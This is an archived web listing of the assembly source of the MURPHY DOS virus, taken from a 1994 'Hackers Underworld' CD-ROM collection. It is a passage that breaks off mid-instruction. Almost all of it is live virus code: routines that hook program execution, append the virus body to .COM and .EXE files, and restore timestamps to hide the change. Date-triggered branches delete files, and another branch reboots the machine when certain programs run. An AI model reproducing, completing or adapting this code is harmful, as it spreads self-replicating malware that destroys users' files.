home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
MURPHY.ASM
< prev
next >
Wrap
Assembly Source File
|
1994-07-17
|
16KB
|
672 lines
PAGE 59,132
;██████████████████████████████████████████████████████████████████████████
;██ ██
;██ MURPHY ██
;██ ██
;██ Created: 4-Mar-91 ██
;██ Version: ██
;██ Passes: 5 Analysis Options on: H ██
;██ ██
;██ ██
;██████████████████████████████████████████████████████████████████████████
data_1e equ 4Ch ; (0000:004C=74h)
data_3e equ 84h ; (0000:0084=0EBh)
data_5e equ 90h ; (0000:0090=56h)
data_7e equ 102h ; (0000:0102=0F000h)
data_8e equ 106h ; (0000:0106=0F000h)
data_9e equ 47Bh ; (0000:047B=14h)
data_10e equ 0 ; (4098:0000=0FFh)
data_11e equ 1 ; (4099:0001=0FFFFh)
data_12e equ 2 ; (40EB:0002=0FFFFh)
data_13e equ 6 ; (40EB:0006=0FFFFh)
data_31e equ 0FC99h ; (7415:FC99=0)
data_32e equ 0FC9Bh ; (7415:FC9B=0)
data_33e equ 0FCB7h ; (7415:FCB7=0)
data_34e equ 0FCB9h ; (7415:FCB9=0)
data_35e equ 0FCBBh ; (7415:FCBB=0)
data_36e equ 0FCC5h ; (7415:FCC5=0)
data_37e equ 0FCC7h ; (7415:FCC7=0)
data_38e equ 0FCCDh ; (7415:FCCD=0)
data_39e equ 0FCCFh ; (7415:FCCF=0)
data_40e equ 0 ; (F000:0000=0AA55h)
data_41e equ 2 ; (F000:0002=40h)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
murphy proc far
start:
jmp loc_28 ; (0466)
db 0C3h
db 23 dup (0C3h)
db 2Ah, 2Eh, 45h, 58h, 45h, 0
data_17 dw 0C3C3h
data_18 dw 0C3C3h
data_19 db 0, 0
data_20 dw 0
data_21 dw 0
data_22 dw 0
data_23 dw 7415h
data_24 dd 00000h
data_25 dw 0
data_26 dw 7415h
data_27 dd 00000h
data_28 dw 0
data_29 dw 7415h
db 0Ah, 0Dh, 0Ah, 0Dh, ' Bhaktivedan'
db 'ta Swami Prabhupada (1896-1977)', 0Ah
db 0Dh, 0Ah, 0Dh, '$'
db '=MKu', 9, 'U'
db 8Bh, 0ECh, 83h, 66h, 6, 0FEh
db 5Dh, 0CFh, 80h, 0FCh, 4Bh, 74h
db 12h, 3Dh, 0, 3Dh, 74h, 0Dh
db 3Dh, 0, 6Ch, 75h, 5, 80h
db 0FBh, 0, 74h, 3, 0E9h, 0BEh
db 0, 6, 1Eh, 57h, 56h, 55h
db 52h, 51h, 53h, 50h, 0E8h, 48h
db 2, 0E8h, 82h, 2, 3Dh, 0
db 6Ch, 75h, 2, 8Bh, 0D6h
loc_1:
mov cx,80h
mov si,dx
locloop_2:
inc si
mov al,[si]
or al,al ; Zero ?
loopnz locloop_2 ; Loop if zf=0, cx>0
sub si,2
cmp word ptr [si],4D4Fh
je loc_5 ; Jump if equal
cmp word ptr [si],4558h
je loc_4 ; Jump if equal
loc_3:
jmp short loc_12 ; (024A)
db 90h
loc_4:
cmp word ptr [si-4],4E41h
je loc_6 ; Jump if equal
cmp word ptr [si-4],444Ch
je loc_6 ; Jump if equal
cmp word ptr [si-4],4A52h
je loc_6 ; Jump if equal
jnz loc_7 ; Jump if not zero
loc_5:
cmp word ptr [si-4],444Eh
je loc_3 ; Jump if equal
jnz loc_8 ; Jump if not zero
loc_6:
int 19h ; Bootstrap loader
loc_7:
jz loc_8 ; Jump if zero
loc_8:
mov ax,3D02h
call sub_5 ; (03E5)
jc loc_12 ; Jump if carry Set
mov bx,ax
mov ax,5700h
call sub_5 ; (03E5)
mov cs:data_20,cx ; (7415:0127=0)
mov cs:data_21,dx ; (7415:0129=0)
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_5 ; (03E5)
push cs
pop ds
mov dx,103h
mov si,dx
mov cx,18h
mov ah,3Fh ; '?'
call sub_5 ; (03E5)
jc loc_10 ; Jump if carry Set
cmp word ptr [si],5A4Dh
jne loc_9 ; Jump if not equal
call sub_1 ; (025B)
jmp short loc_10 ; (0233)
loc_9:
call sub_4 ; (036B)
loc_10:
jc loc_11 ; Jump if carry Set
mov ax,5701h
mov cx,cs:data_20 ; (7415:0127=0)
mov dx,cs:data_21 ; (7415:0129=0)
call sub_5 ; (03E5)
loc_11:
mov ah,3Eh ; '>'
call sub_5 ; (03E5)
loc_12:
call sub_7 ; (0429)
pop ax
pop bx
pop cx
pop dx
pop bp
pop si
pop di
pop ds
pop es
loc_13:
jmp cs:data_24 ; (7415:012F=0)
murphy endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
sub_1 proc near
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
cmp dh,4
je loc_14 ; Jump if equal
jnz loc_15 ; Jump if not zero
loc_14:
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
cmp dl,0Fh
je loc_16 ; Jump if equal
jnz loc_15 ; Jump if not zero
loc_15:
mov cx,[si+16h]
add cx,[si+8]
mov ax,10h
mul cx ; dx:ax = reg * ax
add ax,[si+14h]
adc dx,0
push dx
push ax
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_5 ; (03E5)
cmp dx,0
jne loc_17 ; Jump if not equal
cmp ax,4E2h
jae loc_17 ; Jump if above or =
pop ax
pop dx
stc ; Set carry flag
retn
loc_16:
mov dx,10h
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,11Bh
mov cx,110Bh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
mov dx,2Eh
mov ax,3D02h
int 15h ; General services, ah=func 3Dh
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
jmp loc_23 ; (0395)
db 0BAh, 3Fh, 1, 0B4h, 9, 0CDh
db 21h, 0EBh, 1, 90h
loc_17:
mov di,ax
mov bp,dx
pop cx
sub ax,cx
pop cx
sbb dx,cx
cmp word ptr [si+0Ch],0
je loc_ret_20 ; Jump if equal
cmp dx,0
jne loc_18 ; Jump if not equal
cmp ax,4E2h
jne loc_18 ; Jump if not equal
stc ; Set carry flag
retn
loc_18:
mov dx,bp
mov ax,di
push dx
push ax
add ax,4E2h
adc dx,0
mov cx,200h
div cx ; ax,dx rem=dx:ax/reg
les di,dword ptr [si+2] ; Load 32 bit ptr
mov cs:data_22,di ; (7415:012B=0)
mov cs:data_23,es ; (7415:012D=7415h)
mov [si+2],dx
cmp dx,0
je loc_19 ; Jump if equal
inc ax
loc_19:
mov [si+4],ax
pop ax
pop dx
call sub_2 ; (034C)
sub ax,[si+8]
les di,dword ptr [si+14h] ; Load 32 bit ptr
mov data_17,di ; (7415:0121=0C3C3h)
mov data_18,es ; (7415:0123=0C3C3h)
mov [si+14h],dx
mov [si+16h],ax
mov word ptr data_19,ax ; (7415:0125=0)
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_5 ; (03E5)
call sub_3 ; (035D)
jc loc_ret_20 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_5 ; (03E5)
mov ah,40h ; '@'
mov dx,si
mov cx,18h
call sub_5 ; (03E5)
loc_ret_20:
retn
;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
sub_2:
mov cx,4
mov di,ax
and di,0Fh
locloop_21:
shr dx,1 ; Shift w/zeros fill
rcr ax,1 ; Rotate thru carry
loop locloop_21 ; Loop if cx > 0
mov dx,di
retn
;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
sub_3:
mov ah,40h ; '@'
mov cx,4E2h
mov dx,100h
call sub_6 ; (03EC)
jmp short loc_27 ; (03E5)
db 90h
;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
sub_4:
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
cmp al,6
je loc_22 ; Jump if equal
jnz loc_23 ; Jump if not zero
loc_22:
mov dx,10h
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,11Bh
mov cx,110Bh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
mov dx,2Eh
mov ax,3D02h
int 15h ; General services, ah=func 3Dh
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
jmp short loc_23 ; (0395)
db 90h
loc_23:
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_5 ; (03E5)
cmp ax,4E2h
jb loc_ret_26 ; Jump if below
cmp ax,0FA00h
jae loc_ret_26 ; Jump if above or =
push ax
cmp byte ptr [si],0E9h
jne loc_24 ; Jump if not equal
sub ax,4E5h
cmp ax,[si+1]
j
